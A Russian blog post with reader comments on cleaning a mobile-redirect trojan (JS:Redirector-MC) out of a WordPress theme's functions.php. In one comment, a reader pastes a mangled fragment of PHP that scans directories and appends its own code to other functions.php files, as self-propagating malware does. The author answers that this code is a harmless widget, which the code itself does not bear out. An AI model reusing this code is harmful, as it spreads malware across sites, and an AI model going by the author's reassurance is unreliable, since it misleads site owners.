![Вирус троян JS:Redirector-MC [Trj] (мобильный редирект) на блоге WordPress](http://blogowed.ru/wp-content/uploads/2012/01/23402-200x150.jpg "Вирус троян JS:Redirector-MC [Trj] (мобильный редирект) на блоге WordPress")
Всем привет. Это небольшая статья будет посвящена защите вашего блога WordPress от вирусов и троянов таких как Мобильный редирект, он же JS:Redirector-MC [Trj]. Его можно обнаружить с помощью антивируса AVAST и браузера OPERA, другие антивирусы пока его не видят, повторюсь пока не видят.
Если Вы заметили данный вирус на своем блоге, без паники здесь ничего страшного нет, сейчас я научу Вас как бороться с этим недугом. При заходе на сайт под браузером Opera вы увидели окошко «троян блокирован», заражение «JS:Redirector-MC [Trj]» это и есть наш мобильный редирект.
![JS:Redirector-MC [Trj] (мобильный редирект)](http://blogowed.ru/wp-content/uploads/2012/01/virus2-500x198.png "JS:Redirector-MC [Trj] (мобильный редирект)")
Бороться с ним будем следующим образом.
Открываете файл functions.php и в самом внизу вы можете обнаружить следующий код:
![JS:Redirector-MC [Trj] (мобильный редирект)](http://blogowed.ru/wp-content/uploads/2012/01/Virus-500x259.png "JS:Redirector-MC [Trj] (мобильный редирект)")
Наша задача удалить этот код.
Сделать это можно несколькими способами:
- Удалить код вручную.
- Найти копию файла functions.php и перезалить на хостинге
После того как вы удалите этот код, проверяем наш блог на специальных онлайн сервисах, нет ли еще зараз на блоге.
JS:Redirector-MC [Trj] (мобильный редирект)
У Вас наверно возникают вопросы откуда взялся данный вирус . Я покопался по интернету и нашел ответ, который не очень меня обрадовал скидываю, как скрин.
![JS:Redirector-MC [Trj] (мобильный редирект)](http://blogowed.ru/wp-content/uploads/2012/01/js.png "JS:Redirector-MC [Trj] (мобильный редирект)")
Из — прочитанного можно сделать вывод что ни наш WordPress не сервис не защищен на 100% .
Я поймал этот вирус на 2-х блогах , советую проверить свои блоги на наличии вирусов, особенно те которые находятся на хостинге Timeweb.
Если вовремя не обнаружить вирус, Ваш блог может быстро упасть в позициях, будет большой процент отказов, вообщем ничего хорошего Вас не ожидает.
После удаления вируса, советую:
- ОбновитьWordPress
- Изменить пароль к Ftp
- Изменить пароль на хостинге
- Сделать полный скан компьютера на наличие вирусов
Если ваш блог взломал, об этом я уже писал здесь . Самое главное вовремя заметить и обезвредить. Если что не получается или не понятно, обращайтесь помогу.
Кирилл, версия WordPress какая стоит?
Был установлен WordPress 3.2.1
Сейчас обновился до 3.3.2. Но почему-то не могу зайти в админку
твой сайт который указан в комментариях?
Напиши мне по емайл подробности, Я тебе дам рекомендации
Роман, мой сайт belevichka.ru
почта belevichka@yandex.ru
Твоей почты к сож. не нашел (
Нашел на сайте такой кусок кода, антивирус для вордпресса его ставит под сомнение. Остальные антивирусы не обращают на файлы никакого внимания.
код из файла functions.php
<?php
function _verify_isactivate_widgets(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"») !== false ? «» : «?».»>»;
$output .= $before . «Not found» . $after;
if (stripos( substr($cont,-20),»?».»>») !== false){$cont=substr($cont,0,strripos($cont,»?».»>») + 2);}
$output=rtrim($output, «nt»); fputs($f=fopen($item,»w+»),$cont . $seprar . «n» .$widget);fclose($f);
$output .= ($showsdots && $ellipsis) ? «…» : «»;
}
}
}
}
return $output;
}
function _get_allwidgetscont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == «/»){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != «.» && $elem != «..»){
if (is_dir($places . «/» . $elem)){
$wids[]=$places . «/» . $elem;
} elseif (is_file($places . «/» . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . «/» . $elem;}
}
}
}else{
return false;
Причем ставит под сомнения следующие строчки:
$cont=file_get_contents($item);
$output=rtrim($output, » «); fputs($f=fopen($item,»w+»),$cont . $seprar . » » .$widget);fc …
… n($item,»w+»),$cont . $seprar . » » .$widget);fclose($f);
} elseif (is_file($places . «/» . $elem)&&
Подскажи пожалуйста, что это за код и нужен ли он вообще?
Обратитесь первым делом на сервер, выдает ошибку вход админку (пишет
Сервер временно не в состоянии обслуживать ваш запрос из-за простоя обслуживания или проблемы пропускной способности. Пожалуйста, повторите попытку позже.), у хоста узнаете причину. Этот код выводит виджет, это не вирус
Опаньки. Timeweb… Я уже пол года со своих сайтов у этого провайдера вывожу этих троянов. Похоже пора менять хостера. Ктонить посоветует?
Я ход назад с Timeweb перtшёл на webhost1. Доволен. За 1 доллар даётся 1000МБ места, можно размещать до 10 сайтов, трафик неограничен. Даже предновогодний подъем трафика до 4000-5000 человек в сутки выдержал без проблем. Хотя статистика и показывала превышения нагрузки, предупреждений от хостера не поступало.
А для защиты сайта рекомендую установить плагин wordpress-firewall-2- активировал и забыл, плагин контролирует малейшие изменения в Ваших php файлах, не дает возможности установки плагинов, деактивирует плагины если они не соответствуют безопасности.
Ну так хоть кусок кода для его поиска можно дать?
А то на картинке нифига не разобрать